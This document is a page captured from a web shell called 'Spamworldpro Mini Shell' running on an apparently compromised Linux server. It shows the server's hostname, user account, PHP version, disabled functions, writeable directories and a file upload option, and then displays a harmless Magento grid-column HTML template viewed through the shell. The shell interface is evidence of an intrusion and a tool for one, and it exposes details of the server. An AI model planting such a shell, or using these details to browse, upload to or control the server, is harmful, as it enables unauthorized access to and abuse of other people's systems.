Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/magento/module-ui/view/base/web/templates/grid/columns/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/magento/module-ui/view/base/web/templates/grid/columns/onoff.html
<!--
/**
 * Copyright © Magento, Inc. All rights reserved.
 * See COPYING.txt for license details.
 */
-->

<th class="data-grid-multicheck-cell">
    <label data-bind="i18n: 'Assign'"></label>
    <div
        class="action-multicheck-wrap"
        data-bind="css: {'_disabled': !totalRecords()},
                   collapsible">
        <input
            id="mass-select-checkbox"
            class="admin__control-checkbox"
            type="checkbox"
            data-bind="checked: allSelected(),
                       event: { change: toggleSelectAll },
                       css: { '_indeterminate': indetermine },
                       enable: totalRecords"/>
        <label for="mass-select-checkbox"></label>
        <button
            class="action-multicheck-toggle"
            data-toggle="dropdown"
            data-bind="css: { '_active': $collapsible.opened },
                       enable: totalRecords,
                       toggleCollapsible">
            <span data-bind="i18n: 'Options'"></span>
        </button>
        <ul
            class="action-menu"
            data-bind="closeCollapsible, foreach: actions">
            <li data-bind="click: $parent[value].bind($parent),
                           visible: $parent.isActionRelevant(value)">
                <span class="action-menu-item" data-bind="text: label"></span>
            </li>
        </ul>
    </div>
</th>

Spamworldpro Mini